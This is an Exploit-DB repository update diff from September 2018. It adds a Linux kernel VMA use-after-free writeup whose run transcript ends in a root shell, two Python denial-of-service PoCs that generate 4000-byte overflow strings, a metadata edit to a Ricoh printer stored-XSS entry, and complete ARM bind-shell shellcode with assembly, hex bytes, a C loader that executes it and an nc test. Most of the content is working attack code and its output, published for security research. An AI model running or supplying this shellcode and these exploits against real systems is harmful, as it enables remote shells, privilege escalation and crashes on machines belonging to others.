DB: 2018-09-27

5 changes to exploits/shellcodes

TransMac 12.2 - Denial of Service (PoC)
CrossFont 7.5 - Denial of Service (PoC)

Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath

Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)

exploits/hardware/webapps/45487.txt

@@ -4,13 +4,14 @@
 # Vendor Homepage: https://www.ricoh.com/
 # Hardware Link: https://www.ricoh-europe.com/products/office-printers-fax/all-in-one-printers/mp-305sp.html
 # Software: RICOH Printer
-# Product Version:  MP 305+
+# Product Version:  MP 305+, MP C1803 JPN, MP C6503 Plus, MP C307
 # Vulernability Type: Code Injection
 # Vulenrability: HTML Injection and Stored XSS
 # CVE:
 
-# On the RICOH Aficio MP 305+ printer, HTML Injection and Stored XSS vulnerabilities have been discovered 
+# On the RICOH Aficio MP 305+ printer and other affected models, HTML Injection and Stored XSS 
-# in the area of adding addresses via the entryNameIn parameter to /web/entry/en/address/adrsSetUserWizard.cgi.
+# vulnerabilities have been discovered in the area of adding addresses via the entryNameIn 
+# parameter to /web/entry/en/address/adrsSetUserWizard.cgi.
 
 # HTTP POST Request :
 

exploits/linux/local/45497.txt

@@ -0,0 +1,130 @@
+Since commit 615d6e8756c8 ("mm: per-thread vma caching", first in 3.15),
+Linux has per-task VMA caches that contain up to four VMA pointers for
+fast lookup. VMA caches are invalidated by bumping the 32-bit per-mm
+sequence number mm->vmacache_seqnum; when the sequence number wraps,
+vmacache_flush_all() scans through all running tasks and wipes the
+VMA caches of all tasks that share current's mm.
+
+In commit 6b4ebc3a9078 ("mm,vmacache: optimize overflow system-wide
+flushing", first in 3.16), a bogus fastpath was added that skips the
+invalidation on overflow if current->mm->mm_users==1. This means that
+the following sequence of events triggers a use-after-free:
+
+[A starts as a singlethreaded process]
+A: create mappings X and Y (in separate memory areas
+   far away from other allocations)
+A: perform repeated invalidations until
+   current->mm->vmacache_seqnum==0xffffffff and
+   current->vmacache.seqnum==0xfffffffe
+A: dereference an address in mapping Y that is not
+   paged in (thereby populating A's VMA cache with
+   Y at seqnum 0xffffffff)
+A: unmap mapping X (thereby bumping
+   current->mm->vmacache_seqnum to 0)
+A: without any more find_vma() calls (which could
+   happen e.g. via pagefaults), create a thread B
+B: perform repeated invalidations until
+   current->mm->vmacache_seqnum==0xfffffffe
+B: unmap mapping Y (thereby bumping
+   current->mm->vmacache_seqnum to 0xffffffff)
+A: dereference an address in the freed mapping Y
+   (or any address that isn't present in the
+   pagetables and doesn't correspond to a valid
+   VMA cache entry)
+
+A's VMA cache is still at sequence number 0xffffffff from before the
+overflow. The sequence number has wrapped around in the meantime, back
+to 0xffffffff, and A's outdated VMA cache is considered to be valid.
+
+
+I am attaching the following reproduction files:
+
+vmacache-debugging.patch: Kernel patch that adds some extra logging for
+                          VMA cache internals.
+vma_test.c: Reproducer code
+dmesg: dmesg output of running the reproducer in a VM
+
+In a Debian 9 VM, I've tested the reproducer against a 4.19.0-rc3+
+kernel with vmacache-debugging.patch applied, configured with
+CONFIG_DEBUG_VM_VMACACHE=y.
+
+Usage:
+
+user@debian:~/vma_bug$ gcc -O2 -o vma_test vma_test.c -g && ./vma_test
+Segmentation fault
+
+
+Within around 40 minutes, I get the following warning in dmesg:
+
+=============================================
+[ 2376.292518] WARNING: CPU: 0 PID: 1103 at mm/vmacache.c:157 vmacache_find+0xbb/0xd0
+[ 2376.296813] Modules linked in: btrfs xor zstd_compress raid6_pq
+[ 2376.300095] CPU: 0 PID: 1103 Comm: vma_test Not tainted 4.19.0-rc3+ #161
+[ 2376.303650] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
+[ 2376.305796] RIP: 0010:vmacache_find+0xbb/0xd0
+[ 2376.306963] Code: 48 85 c0 74 11 48 39 78 40 75 1f 48 39 30 77 06 48 39 70 08 77 19 83 c2 01 83 fa 04 41 0f 44 d1 83 e9 01 75 c7 31 c0 c3 f3 c3 <0f> 0b 31 c0 c3 65 48 ff 05 98 97 9b 6a c3 90 90 90 90 90 90 90 0f
+[ 2376.311881] RSP: 0000:ffffa934c1e3bec0 EFLAGS: 00010283
+[ 2376.313258] RAX: ffff8ac7eaf997d0 RBX: 0000133700204000 RCX: 0000000000000004
+[ 2376.315165] RDX: 0000000000000001 RSI: 0000133700204000 RDI: ffff8ac7f3820dc0
+[ 2376.316998] RBP: ffff8ac7f3820dc0 R08: 0000000000000001 R09: 0000000000000000
+[ 2376.318789] R10: 0000000000000000 R11: 0000000000000000 R12: ffffa934c1e3bf58
+[ 2376.320590] R13: ffff8ac7f3820dc0 R14: 0000000000000055 R15: ffff8ac7e9355140
+[ 2376.322481] FS:  00007f96165ca700(0000) GS:ffff8ac7f3c00000(0000) knlGS:0000000000000000
+[ 2376.324620] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[ 2376.326101] CR2: 0000133700204000 CR3: 0000000229d28001 CR4: 00000000003606f0
+[ 2376.327906] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
+[ 2376.329819] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
+[ 2376.331571] Call Trace:
+[ 2376.332208]  find_vma+0x16/0x70
+[ 2376.332991]  ? vfs_read+0x10f/0x130
+[ 2376.333852]  __do_page_fault+0x191/0x470
+[ 2376.334816]  ? async_page_fault+0x8/0x30
+[ 2376.335776]  async_page_fault+0x1e/0x30
+[ 2376.336746] RIP: 0033:0x555e2a2b4c37
+[ 2376.337600] Code: 05 80 e8 9c fc ff ff 83 f8 ff 0f 84 ad 00 00 00 8b 3d 81 14 20 00 e8 48 02 00 00 48 b8 00 40 20 00 37 13 00 00 bf 37 13 37 13 <c6> 00 01 31 c0 e8 cf fc ff ff 48 83 ec 80 31 c0 5b 5d 41 5c c3 48
+[ 2376.342085] RSP: 002b:00007ffd505e8d30 EFLAGS: 00010206
+[ 2376.343334] RAX: 0000133700204000 RBX: 0000000100000000 RCX: 00007f9616102700
+[ 2376.345133] RDX: 0000000000000008 RSI: 00007ffd505e8d18 RDI: 0000000013371337
+[ 2376.346834] RBP: 00007f96165e4000 R08: 0000000000000000 R09: 0000000000000000
+[ 2376.348889] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000100000000
+[ 2376.350570] R13: 00007ffd505e8ea0 R14: 0000000000000000 R15: 0000000000000000
+[ 2376.352246] ---[ end trace 995fa641c5115cfb ]---
+[ 2376.353406] vma_test[1103]: segfault at 133700204000 ip 0000555e2a2b4c37 sp 00007ffd505e8d30 error 6 in vma_test[555e2a2b4000+2000]
+=============================================
+
+The source code corresponding to the warning, which is triggered because
+the VMA cache references a VMA struct that has been reallocated to
+another process in the meantime:
+
+#ifdef CONFIG_DEBUG_VM_VMACACHE
+			if (WARN_ON_ONCE(vma->vm_mm != mm))
+				break;
+#endif
+
+
+################################################################################
+
+
+Attaching an ugly exploit for Ubuntu 18.04, kernel linux-image-4.15.0-34-generic at version 4.15.0-34.37. It takes about an hour to run before popping a root shell. Usage: First compile with ./compile.sh, then run ./puppeteer. Example run:
+
+user@ubuntu-18-04-vm:~/vmacache$ ./puppeteer 
+Do Sep 20 23:55:11 CEST 2018
+puppeteer: old kmsg consumed
+got map from child!
+got WARNING
+got RSP line: 0xffff9e0bc2263c60
+got RAX line: 0xffff8c7caf1d61a0
+got RDI line: 0xffff8c7c214c7380
+reached WARNING part 2
+got R8 line: 0xffffffffa7243680
+trace consumed
+offset: 0x110
+fake vma pushed
+suid file detected, launching rootshell...
+we have root privs now...
+Fr Sep 21 00:48:00 CEST 2018
+root@ubuntu-18-04-vm:~/vmacache# 
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45497.zip

exploits/windows_x86/dos/45493.py

@@ -0,0 +1,25 @@
+# Exploit Title: TransMac 12.2 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-26
+# Software Link: http://www.acutesystems.com/tmac/tmsetup.exe
+# Tested Version: 12.2
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "Enter Key"
+# Now paste the contents of "exploit.txt" into the fields:"License Key/Code"
+# Click "OK" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 4000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows_x86/dos/45494.py

@@ -0,0 +1,25 @@
+# Exploit Title: CrossFont 7.5 - Denial of Service (PoC)
+# Author: Gionathan "John" Reale
+# Discovey Date: 2018-09-26
+# Software Link: http://www.acutesystems.com/cfnt/cfsetup.exe
+# Tested Version: 7.5
+# Tested on OS: Windows 7 32-bit
+# Steps to Reproduce: Run the python exploit script, it will create a new 
+# file with the name "exploit.txt". Copy the content from "exploit.txt".
+# Now start the program. When inside the program click "Enter Key"
+# Now paste the contents of "exploit.txt" into the fields:"License Key/Code"
+# Click "OK" and you will see a crash.
+
+#!/usr/bin/python
+   
+buffer = "A" * 4000
+
+payload = buffer
+try:
+    f=open("exploit.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

files_exploits.csv

@@ -6135,6 +6135,8 @@ id,file,description,date,author,type,platform,port
 45486,exploits/multiple/dos/45486.html,"WebKit - 'WebCore::RenderLayer::updateDescendantDependentFlags' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
 45488,exploits/multiple/dos/45488.html,"WebKit - 'WebCore::SVGTextLayoutAttributes::context' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
 45489,exploits/multiple/dos/45489.html,"WebKit - 'WebCore::RenderTreeBuilder::removeAnonymousWrappersForInlineChildrenIfNeeded' Use-After-Free",2018-09-25,"Google Security Research",dos,multiple,
+45493,exploits/windows_x86/dos/45493.py,"TransMac 12.2 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86,
+45494,exploits/windows_x86/dos/45494.py,"CrossFont 7.5 - Denial of Service (PoC)",2018-09-26,"Gionathan Reale",dos,windows_x86,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10001,6 +10003,7 @@ id,file,description,date,author,type,platform,port
 45467,exploits/windows_x86/local/45467.py,"Easy PhoroResQ 1.0 - Buffer Overflow",2018-09-25,"Cemal Cihad ÇİFTÇİ",local,windows_x86,
 45479,exploits/solaris/local/45479.rb,"Solaris - 'EXTREMEPARR' dtappgather Privilege Escalation (Metasploit)",2018-09-25,Metasploit,local,solaris,
 45492,exploits/windows_x86/local/45492.py,"Faleemi Desktop Software 1.8.2 - 'Device alias' Local Buffer Overflow (SEH)",2018-09-25,"Gionathan Reale",local,windows_x86,
+45497,exploits/linux/local/45497.txt,"Linux - VMA Use-After-Free via Buggy vmacache_flush_all() Fastpath",2018-09-26,"Google Security Research",local,linux,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139

files_shellcodes.csv

@@ -916,3 +916,4 @@ id,file,description,date,author,type,platform
 45441,shellcodes/linux_x86/45441.c,"Linux/x86 - Egghunter (0x50905090) + sigaction() Shellcode (27 bytes)",2018-09-20,"Valerio Brussani",shellcode,linux_x86
 45458,shellcodes/arm/45458.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) Shellcode (28 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm
 45459,shellcodes/arm/45459.c,"Linux/ARM - Egghunter (PWN!) + execve(_/bin/sh__ NULL_ NULL) + sigaction() Shellcode (52 Bytes)",2018-09-24,"Ken Kitahara",shellcode,arm
+45495,shellcodes/arm/45495.c,"Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)",2018-09-26,"Ken Kitahara",shellcode,arm

shellcodes/arm/45495.c

@@ -0,0 +1,135 @@
+/*
+# Title:  Linux/ARM - Bind (0.0.0.0:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)
+# Date:   2018-09-26
+# Tested: armv7l (Raspberry Pi 3 Model B+)
+# Author: Ken Kitahara
+
+[System Information]
+pi@raspberrypi:~ $ uname -a
+Linux raspberrypi 4.14.52-v7+ #1123 SMP Wed Jun 27 17:35:49 BST 2018 armv7l GNU/Linux
+pi@raspberrypi:~ $ lsb_release -a
+No LSB modules are available.
+Distributor ID:	Raspbian
+Description:	Raspbian GNU/Linux 9.4 (stretch)
+Release:	9.4
+Codename:	stretch
+pi@raspberrypi:~ $
+
+
+[Source Code]
+pi@raspberrypi:~ $ cat bindshell.s 
+.section .text
+.global _start
+
+_start:
+    .ARM
+    add  lr, pc, #1
+    bx   lr
+
+    .THUMB
+    // socket(2, 1, 0)
+    mov  r0, #2
+    mov  r1, #1
+    eor  r2, r2, r2
+    mov  r7, #200
+    add  r7, #81
+    svc  #1
+    mov  r3, r0
+
+    // bind(fd, &sockaddr, 16)
+    adr  r1, struct_addr
+    strb r2, [r1, #1]
+    str  r2, [r1, #4]
+    mov  r2, #16
+    add  r7, r7, #1
+    svc  #1
+
+    // listen(host_sockid, 2)
+    mov  r0, r3
+    mov  r1, #2
+    add  r7, r7, #2
+    svc  #1
+
+    // accept(host_sockid, 0, 0)
+    mov  r0, r3
+    eor  r1, r1, r1
+    eor  r2, r2, r2
+    add  r7, r7, #1
+    svc  #1
+
+    mov  r3, r0
+    mov  r1, #3
+    mov  r7, #63
+
+    duploop:
+    // dup2(client_sockid, 2)
+    // -> dup2(client_sockid, 1)
+    // -> dup2(client_sockid, 0)
+    mov  r0, r3
+    sub  r1, r1, #1
+    svc  #1
+    cmp  r1, r2
+    bne  duploop
+
+    // execve("/bin/sh", 0, 0)
+    adr  r0, spawn
+    strb r1, [r0, #7]
+    mov  r7, #11
+    svc  #1
+
+struct_addr:
+.ascii "\x02\xff"
+.ascii "\x11\x5c"
+.byte 1,1,1,1
+
+spawn:
+.ascii "/bin/shX"
+pi@raspberrypi:~ $ as -o bindshell.o bindshell.s && ld -N -o bindshell bindshell.o
+pi@raspberrypi:~ $ objcopy -O binary bindshell bindshell.bin
+pi@raspberrypi:~ $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' bindshell.bin && echo
+\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1\x02\x20\x01\x21\x52\x40\xc8\x27\x51\x37\x01\xdf\x03\x1c\x0d\xa1\x4a\x70\x4a\x60\x10\x22\x01\x37\x01\xdf\x18\x1c\x02\x21\x02\x37\x01\xdf\x18\x1c\x49\x40\x52\x40\x01\x37\x01\xdf\x03\x1c\x03\x21\x3f\x27\x18\x1c\x01\x39\x01\xdf\x91\x42\xfa\xd1\x03\xa0\xc1\x71\x0b\x27\x01\xdf\x02\xff\x11\x5c\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58
+pi@raspberrypi:~ $
+
+
+[Operation Test]
+(1) Compile and execute this PoC.
+pi@raspberrypi:~ $ gcc -fno-stack-protector -z execstack loader-bind.c -o loader-bind
+pi@raspberrypi:~ $ ./loader-bind
+Shellcode Length: 92
+
+(2) Connect to 127.0.0.1:4444/TCP from another terminal.
+pi@raspberrypi:~ $ nc -vv 127.0.0.1 4444
+Connection to 127.0.0.1 4444 port [tcp/*] succeeded!
+id
+uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),101(input),108(netdev),997(gpio),998(i2c),999(spi)
+exit
+^C
+pi@raspberrypi:~ $
+
+*/
+
+#include<stdio.h>
+#include<string.h>
+
+unsigned char sc[] = \
+"\x01\xe0\x8f\xe2\x1e\xff\x2f\xe1"
+"\x02\x20\x01\x21\x52\x40\xc8\x27"
+"\x51\x37\x01\xdf\x03\x1c\x0d\xa1"
+"\x4a\x70\x4a\x60\x10\x22\x01\x37"
+"\x01\xdf\x18\x1c\x02\x21\x02\x37"
+"\x01\xdf\x18\x1c\x49\x40\x52\x40"
+"\x01\x37\x01\xdf\x03\x1c\x03\x21"
+"\x3f\x27\x18\x1c\x01\x39\x01\xdf"
+"\x91\x42\xfa\xd1\x03\xa0\xc1\x71"
+"\x0b\x27\x01\xdf\x02\xff\x11\x5c"
+"\x01\x01\x01\x01\x2f\x62\x69\x6e"
+"\x2f\x73\x68\x58";
+
+void main()
+{
+    printf("Shellcode Length: %d\n", strlen(sc));
+
+    int (*ret)() = (int(*)())sc;
+
+    ret();
+}